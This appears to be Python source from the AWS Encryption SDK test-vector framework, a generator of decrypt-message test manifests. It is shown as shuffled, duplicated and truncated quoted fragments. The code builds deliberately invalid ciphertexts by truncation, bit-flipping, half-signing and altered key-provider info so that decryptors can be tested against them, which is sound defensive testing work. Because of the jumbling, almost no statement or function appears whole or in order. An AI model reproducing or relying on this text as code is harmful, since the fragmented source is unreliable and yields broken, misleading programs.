\"\"\"", "cover # We only actually need these imports when running", "Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec = scenario[\"encryption-scenario\"] encryption_scenario", "3.5.1 have incompatible typing modules from typing import IO, Callable,", "\"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized tampering method tag: \" +", "dict scenario: Scenario specification JSON :param KeysManifest keys: Loaded keys", "+ tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri):", "test_scenarios = { decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items()", "= self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return", "the matching decrypt scenario. :param callable ciphertext_writer: Callable that will", "# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights", "aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from awses_test_vectors.internal.defaults import", "(PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate required plaintext values. :param dict", "json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name,", "Version of this manifest :param KeysManifest keys: Loaded keys :param", "\"\"\" return {name: os.urandom(size) for name, size in plaintexts_specs.items()} @classmethod", "# # http://aws.amazon.com/apache2.0/ # # or in the \"license\" file", "dict \"\"\" return {name: os.urandom(size) for name, size in plaintexts_specs.items()}", "\"\"\"Tampering method that produces a message with a single bit", "generation_scenario.result: expected_result = generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext", "pragma: no cover # We only actually need these imports", "under the License. \"\"\" AWS Encryption SDK Decrypt Message Generation", "that truncates a good message at every byte (except zero).\"\"\"", "output :param int json_indent: Number of spaces to indent JSON", "generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [", "context. THIS IS ONLY USED TO CREATE INVALID MESSAGES and", "else: decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\")", "generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte {}\".format(length)),", "master key specifications :type decryption_master_key_specs: iterable of :class:`MasterKeySpec` :param Callable", ":param dict tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s", "INVALID MESSAGES and should never be used in production! 
    @classmethod
    def from_scenario(cls, scenario, keys, plaintexts):
        """Load from a scenario specification.

        :param dict scenario: Scenario specification JSON
        :param KeysManifest keys: Loaded keys
        :param dict plaintexts: Mapping of plaintext names to plaintext values
        :return: Loaded test scenario
        :rtype: MessageDecryptionTestScenarioGenerator
        """
        encryption_scenario_spec = scenario["encryption-scenario"]
        encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts)
        tampering = scenario.get("tampering")
        tampering_method = TamperingMethod.from_tampering_spec(tampering)
        decryption_method_spec = scenario.get("decryption-method")
        decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None
        if "decryption-master-keys" in scenario:
            decryption_master_key_specs = [
                MasterKeySpec.from_scenario(spec) for spec in scenario["decryption-master-keys"]
            ]

            def decryption_master_key_provider_fn():
                return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs)

        else:
            decryption_master_key_specs = encryption_scenario.master_key_specs
            decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn
        result_spec = scenario.get("result")
        result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None

        return cls(
            encryption_scenario=encryption_scenario,
            tampering_method=tampering_method,
            decryption_method=decryption_method,
            decryption_master_key_specs=decryption_master_key_specs,
            decryption_master_key_provider_fn=decryption_master_key_provider_fn,
            result=result,
        )
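    # A hypothetical scenario specification accepted by from_scenario (nested
    # specs are elided; only the top-level keys used above are real):
    #
    #     {
    #         "encryption-scenario": {...},
    #         "tampering": {"change-edk-provider-info": ["tampered-info"]},
    #         "decryption-master-keys": [{...}],
    #         "result": {...}
    #     }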
\"\"\" import json import os import", "and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param", "ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\"", "deserialization to and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption", "AWS Encryption SDK Decrypt Message Generation. \"\"\" import json import", "request): \"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE =", "an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF #", "Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt", "os import uuid from copy import copy import attr import", "with the ciphertext :type tampering_method: :class:`TamperingMethod` :param decryption_method: :param decryption_master_key_specs:", "\"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self, materials_manager,", "\"\"\"Thunks to the wrapped CMM\"\"\" return self.wrapped_cmm.decrypt_materials(request) BITS_PER_BYTE = 8", "input_file: File object for file containing JSON manifest :return: Loaded", "typing modules from typing import IO, Callable, Dict, Iterable, Optional", "tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec = scenario.get(\"decryption-method\") decryption_method", "pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)", "MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC)", "provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)", "THIS IS ONLY USED TO CREATE INVALID MESSAGES and should", "generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM", "for every possible bit.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer,", "= spec.items() if tampering_tag == \"change-edk-provider-info\": return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec) raise ValueError(\"Unrecognized", "provider info on all EDKs.\"\"\" # pylint: disable=R0201 def run_scenario_with_tampering(self,", "``ciphertext_writer`` and returning a :class:`MessageDecryptionTestScenario` that describes the matching decrypt", "in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys, plaintexts=plaintexts )", "decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name] ).items() } decrypt_manifest =", "\"\"\"AWS Encryption SDK Decryption Message Generation manifest handler. Described in", "in production! 
    def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result):
        """Create a new (name, decryption scenario) pair"""
        ciphertext_name = str(uuid.uuid4())
        ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt)

        return (
            ciphertext_name,
            MessageDecryptionTestScenario(
                ciphertext_uri=ciphertext_uri,
                ciphertext=ciphertext_to_decrypt,
                master_key_specs=self.decryption_master_key_specs,
                master_key_provider_fn=self.decryption_master_key_provider_fn,
                decryption_method=self.decryption_method,
                result=expected_result,
            ),
        )
\"\"\" ciphertext_to_decrypt = generation_scenario.encryption_scenario.run() return", "try: # Python 3.5.0 and 3.5.1 have incompatible typing modules", "range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ] @classmethod def flip_bit(cls, ciphertext, bit):", "a new CMM that wraps a the given CMM.\"\"\" self.wrapped_cmm", "validate_manifest_type, ) from awses_test_vectors.manifests.full_message.decrypt import ( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario,", "the wrapped default CMM, and then changing the algorithm suite", "six.binary_type)) tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def", "language governing permissions and limitations under the License. \"\"\" AWS", "ciphertext, bit): \"\"\"Flip only the given bit in the given", "@attr.s class MessageDecryptionTestScenarioGenerator(object): # pylint: disable=too-many-instance-attributes \"\"\"Data class for a", "Mapping of plaintext names to plaintext values :param dict tests:", "EDKS. THIS IS ONLY USED TO CREATE INVALID MESSAGES and", "] class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager): \"\"\" Custom CMM that generates materials for", "message at every byte (except zero).\"\"\" # pylint: disable=R0201 def", "self.new_provider_infos ] def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ):", "input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file", "= file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris", "to and from manifest specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters", "def run_scenario_with_new_provider_info( self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info ): \"\"\"Run with", "AWS Encryption SDK Decrypt Message Generation. :param int version: Version", "spec == \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if", "manifest handler. Described in AWS Crypto Tools Test Vector Framework", "\"\"\"Load from a tampering parameters specification\"\"\" return ChangeEDKProviderInfoTamperingMethod(values_spec) # pylint:", "self.new_provider_info return result def decrypt_materials(self, request): \"\"\"Thunks to the wrapped", "from a scenario specification. :param dict scenario: Scenario specification JSON", "specific new provider info value\"\"\" tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt", "decrypt scenario. 
    @staticmethod
    def _generate_plaintexts(plaintexts_specs):
        # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes]
        """Generate required plaintext values.

        :param dict plaintexts_specs: Mapping of plaintext name to size in bytes
        :return: Mapping of plaintext name to randomly generated bytes
        :rtype: dict
        """
        return {name: os.urandom(size) for name, size in plaintexts_specs.items()}
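    # For example (illustrative): _generate_plaintexts({"small": 10}) returns
    # {"small": <10 random bytes>}, regenerated on every manifest load.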
    @classmethod
    def from_file(cls, input_file):
        # type: (IO) -> MessageDecryptionGenerationManifest
        """Load from a file containing a full message encrypt manifest.

        :param file input_file: File object for file containing JSON manifest
        :return: Loaded manifest
        :rtype: MessageDecryptionGenerationManifest
        """
        raw_manifest = json.load(input_file)
        validate_manifest_type(
            type_name=cls.type_name, manifest_version=raw_manifest["manifest"], supported_versions=SUPPORTED_VERSIONS
        )

        parent_dir = os.path.abspath(os.path.dirname(input_file.name))
        reader = file_reader(parent_dir)
        raw_keys_manifest = json.loads(reader(raw_manifest["keys"]).decode(ENCODING))
        keys = KeysManifest.from_manifest_spec(raw_keys_manifest)
        plaintexts = cls._generate_plaintexts(raw_manifest["plaintexts"])

        tests = {}
        for name, scenario in raw_manifest["tests"].items():
            try:
                tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario(
                    scenario=scenario, keys=keys, plaintexts=plaintexts
                )
            except NotImplementedError:
                continue

        return cls(version=raw_manifest["manifest"]["version"], keys=keys, plaintexts=plaintexts, tests=tests)
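    # Typical driver flow (a sketch; the file and directory names are
    # hypothetical):
    #
    #     with open("decrypt-generation-manifest.json") as f:
    #         manifest = MessageDecryptionGenerationManifest.from_file(f)
    #     manifest.run_and_write_to_dir("output", json_indent=2)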
\"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info", "tampering method is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm", "\"\"\" version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS)) keys = attr.ib(validator=attr.validators.instance_of(KeysManifest)) plaintexts = attr.ib(validator=dictionary_validator(six.string_types,", "= attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario, keys,", "\"\"\" import json import os import uuid from copy import", "AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption", "result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt =", "= ciphertext_writer(ciphertext_name, ciphertext_to_decrypt) return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs,", "\"\"\" root_dir = os.path.abspath(target_directory) root_writer = file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING))", "for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result def", "USED TO CREATE INVALID MESSAGES and should never be used", "# noqa pylint: disable=unused-import ENCRYPT_SCENARIO_SPEC, PLAINTEXTS_SPEC, ) except ImportError: #", "specification JSON :param KeysManifest keys: Loaded keys :param dict plaintexts:", "the License. A copy of # the License is located", "CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager from", "from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python 3.5.0 and", "to plaintext values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\"", "Encryption SDK Decrypt Message Generation manifest handler. Described in AWS", "parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING)) keys", "have incompatible typing modules from typing import IO, Callable, Dict,", "when running the mypy checks pass SUPPORTED_VERSIONS = (2,) class", "the provider info on all EDKs.\"\"\" # pylint: disable=R0201 def", "generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result = generation_scenario.result else: expected_result = MessageDecryptionTestResult.expect_output(", "\"\"\"Load from a scenario specification. :param dict scenario: Scenario specification", "cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100,", "json import os import uuid from copy import copy import", "suite and removing the signing key from teh result. 
\"\"\"", "tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator)) type_name = \"awses-decrypt-generate\" @staticmethod def _generate_plaintexts(plaintexts_specs):", "supported_versions=SUPPORTED_VERSIONS ) parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest =", "describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self,", "algorithm suite that includes the \"aws-crypto-public-key\" encryption context. THIS IS", "from awses_test_vectors.internal.defaults import ENCODING from awses_test_vectors.internal.util import ( dictionary_validator, file_reader,", "named ciphertext and return a URI locating the written data", "values. :param dict plaintexts_specs: Mapping of plaintext name to size", "indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris = {name: plaintext_writer(name, plaintext)", ":param result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method", "tests = {} for name, scenario in raw_manifest[\"tests\"].items(): try: tests[name]", "that describes the generated scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer,", "the \"license\" file accompanying this file. This file is #", "spec): \"\"\"Load from a tampering specification\"\"\" if spec is None:", "modifies the provider info field on EDKS. THIS IS ONLY", "= generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, TruncateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit), MessageDecryptionTestResult.expect_error(\"Bit {}", "return TruncateTamperingMethod() if spec == \"mutate\": return MutateTamperingMethod() if spec", "if spec == \"mutate\": return MutateTamperingMethod() if spec == \"half-sign\":", "name, scenario in self.tests.items() for decrypt_scenario_name, decrypt_scenario in scenario.run( ciphertext_writer,", "\"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec in", "# pragma: no cover # We only actually need these", "this scenario :return: Decrypt test scenario that describes the generated", "time. cache = LocalCryptoMaterialsCache(10) caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0,", "for spec in scenario[\"decryption-master-keys\"] ] def decryption_master_key_provider_fn(): return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs)", "disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run a given", "# Use a caching CMM to avoid generating a new", "Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message", "decryption_master_key_specs = encryption_scenario.master_key_specs decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn result_spec = scenario.get(\"result\") result", "bytes] \"\"\"Generate required plaintext values. 
:param dict plaintexts_specs: Mapping of", "file_writer(root_dir) root_writer(\"keys.json\", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING)) plaintext_writer = file_writer(os.path.join(root_dir, \"plaintexts\")) plaintext_uris =", "keys = KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for", "scenario[\"encryption-scenario\"] encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method", "as AlgorithmSuite from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs try: # Python", "specs. :param MessageEncryptionTestScenario encryption_scenario: Encryption parameters :param tampering_method: Optional method", "new (name, decryption scenario) pair\"\"\" ciphertext_name = str(uuid.uuid4()) ciphertext_uri =", "specific # language governing permissions and limitations under the License.", "CMM that modifies the provider info field on EDKS. THIS", ":return: Mapping of plaintext name to randomly generated bytes :rtype:", "= AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384 result = self.wrapped_default_cmm.get_encryption_materials(signing_request) result.algorithm = request.algorithm result.signing_key =", "@staticmethod def _generate_plaintexts(plaintexts_specs): # type: (PLAINTEXTS_SPEC) -> Dict[str, bytes] \"\"\"Generate", "# type: (str, Optional[int]) -> None \"\"\"Process all known encrypt", "= DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager) if generation_scenario.result: expected_result", "= generation_scenario.encryption_scenario.run() return [ generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt[0:length], MessageDecryptionTestResult.expect_error(\"Truncated at byte", "pylint: disable=too-many-instance-attributes \"\"\"Data class for a single full message decrypt", "method is only supported on the \" \"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite.\"", "= KeysManifest.from_manifest_spec(raw_keys_manifest) plaintexts = cls._generate_plaintexts(raw_manifest[\"plaintexts\"]) tests = {} for name,", "TamperingMethod: \"\"\"Base class for all tampering methods.\"\"\" @classmethod def from_tampering_spec(cls,", "tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\"", "(ciphertext, result) pairs \"\"\" materials_manager = DefaultCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt", "= CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info(", "\"Incorrect encrypted data key provider info: \" + new_provider_info )", "a malicious decryptor without encryption permissions might do, to attempt", "on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in", "provider info on each EDK. \"\"\" result = self.wrapped_cmm.get_encryption_materials(request) for", "type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file containing a", "License. 
\"\"\" AWS Encryption SDK Decrypt Message Generation manifest handler.", "] @classmethod def flip_bit(cls, ciphertext, bit): \"\"\"Flip only the given", "raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir =", "= { decrypt_scenario_name: decrypt_scenario for name, scenario in self.tests.items() for", ") parent_dir = os.path.abspath(os.path.dirname(input_file.name)) reader = file_reader(parent_dir) raw_keys_manifest = json.loads(reader(raw_manifest[\"keys\"]).decode(ENCODING))", "\"\"\" self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing", "@classmethod def from_file(cls, input_file): # type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load", "class HalfSigningTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider info on", "= ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Incorrect", "\"\"\" Request materials from the wrapped CMM, and then change", "scenario :rtype: MessageDecryptionTestScenario \"\"\" return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri)) def decryption_test_scenario_pair(self,", "used to tamper with the ciphertext :type tampering_method: :class:`TamperingMethod` :param", "# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager) expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned", "from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario from awses_test_vectors.manifests.keys import KeysManifest try: from", "expected_result = MessageDecryptionTestResult.expect_error( \"Unsigned message using a data key with", ":rtype: MessageEncryptionManifest \"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS", "= DefaultCryptoMaterialsManager(master_key_provider) def get_encryption_materials(self, request): \"\"\" Generate half-signing materials by", "\" + new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result )", "write all output :param int json_indent: Number of spaces to", "== \"half-sign\": return HalfSigningTamperingMethod() ((tampering_tag, tampering_values_spec),) = spec.items() if tampering_tag", "typing import IO, Callable, Dict, Iterable, Optional # noqa pylint:", "in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for spec in scenario[\"decryption-master-keys\"]", "return ( ciphertext_name, MessageDecryptionTestScenario( ciphertext_uri=ciphertext_uri, ciphertext=ciphertext_to_decrypt, master_key_specs=self.decryption_master_key_specs, master_key_provider_fn=self.decryption_master_key_provider_fn, decryption_method=self.decryption_method, result=expected_result,", "a single full message decrypt test scenario. 
Handles serialization and", "\"\"\" raw_manifest = json.load(input_file) validate_manifest_type( type_name=cls.type_name, manifest_version=raw_manifest[\"manifest\"], supported_versions=SUPPORTED_VERSIONS ) parent_dir", "# pylint: disable=R0201 def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri): \"\"\" Run", "aws_encryption_sdk.identifiers import AlgorithmSuite except ImportError: from aws_encryption_sdk.identifiers import Algorithm as", "run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri): \"\"\" Run a given scenario, tampering", "production! \"\"\" wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types)) def __init__(self,", "method tag: \" + tampering_tag) # pylint: disable=R0201 def run_scenario_with_tampering(self,", "that modifies the provider info field on EDKS. THIS IS", "to reject. \"\"\" wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager)) def __init__(self, master_key_provider): \"\"\"", "result: \"\"\" encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario)) tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod))) decryption_method =", "CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [ self.run_scenario_with_new_provider_info( ciphertext_writer,", "message, and therefore this is an important case for ESDKs", "produces a message with a single bit flipped, for every", "spec is None: return TamperingMethod() if spec == \"truncate\": return", "signing materials from the wrapped default CMM, and then changing", "None if \"decryption-master-keys\" in scenario: decryption_master_key_specs = [ MasterKeySpec.from_scenario(spec) for", "limitations under the License. \"\"\" AWS Encryption SDK Decrypt Message", "request): \"\"\" Generate half-signing materials by requesting signing materials from", "new_provider_info ) return generation_scenario.decryption_test_scenario_pair( ciphertext_writer, ciphertext_to_decrypt, expected_result ) class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager):", "keys: Loaded keys :param dict plaintexts: Mapping of plaintext names", "plaintexts): \"\"\"Load from a scenario specification. 
:param dict scenario: Scenario", "expected_result) ] class ChangeEDKProviderInfoTamperingMethod(TamperingMethod): \"\"\"Tampering method that changes the provider", "type: (str, Optional[int]) -> None \"\"\"Process all known encrypt test", "caching_cmm = CachingCryptoMaterialsManager( master_key_provider=master_key_provider, cache=cache, max_age=60.0, max_messages_encrypted=100, ) return [", "decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod))) decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec)) decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable())", "locating the written plaintext data for this scenario :return: Decrypt", "keys, plaintexts) tampering = scenario.get(\"tampering\") tampering_method = TamperingMethod.from_tampering_spec(tampering) decryption_method_spec =", "decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result): \"\"\"Create a new (name, decryption scenario)", "self.wrapped_cmm.get_encryption_materials(request) for encrypted_data_key in result.encrypted_data_keys: encrypted_data_key.key_provider.key_info = self.new_provider_info return result", "plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result) ] class", "a new data key every time. cache = LocalCryptoMaterialsCache(10) caching_cmm", "algorithm suite.\" ) def decrypt_materials(self, request): \"\"\"Thunks to the wrapped", "= None return result raise NotImplementedError( \"The half-sign tampering method", "name, scenario in raw_manifest[\"tests\"].items(): try: tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario( scenario=scenario, keys=keys,", "None: return TamperingMethod() if spec == \"truncate\": return TruncateTamperingMethod() if", "# type: (IO) -> MessageDecryptionGenerationManifest \"\"\"Load from a file containing", "aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager from aws_encryption_sdk.materials_managers.default import", "matching decrypt scenario. :param callable ciphertext_writer: Callable that will write", "ciphertext_writer, plaintext_uri): \"\"\"Run this scenario, writing the resulting ciphertext with", "Directory in which to write all output :param int json_indent:", "method that changes the provider info on all EDKs.\"\"\" new_provider_infos", "keys :param dict plaintexts: Mapping of plaintext names to plaintext", "( DecryptionMethod, MessageDecryptionManifest, MessageDecryptionTestResult, MessageDecryptionTestScenario, ) from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario", "caching CMM to avoid generating a new data key every", "scenario. :param callable ciphertext_writer: Callable that will write the requested", "License, Version 2.0 (the \"License\"). 
You # may not use", "the written plaintext data for this scenario :return: Decrypt test", "We only actually need these imports when running the mypy", "flipped\".format(bit)), ) for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE) ]", "\"Unsigned message using a data key with a public key\"", "values :return: Loaded test scenario :rtype: MessageDecryptionTestScenarioGenerator \"\"\" encryption_scenario_spec =", "class TruncateTamperingMethod(TamperingMethod): \"\"\"Tampering method that truncates a good message at", "for name, size in plaintexts_specs.items()} @classmethod def from_file(cls, input_file): #", "else: expected_result = MessageDecryptionTestResult.expect_output( plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext ) return [ generation_scenario.decryption_test_scenario_pair(ciphertext_writer,", "License for the specific # language governing permissions and limitations", "decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable()) result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult))) @classmethod def from_scenario(cls, scenario,", "result) pairs. \"\"\" tampering_materials_manager = HalfSigningCryptoMaterialsManager( generation_scenario.encryption_scenario.master_key_provider_fn() ) ciphertext_to_decrypt =", "manifest :param KeysManifest keys: Loaded keys :param dict plaintexts: 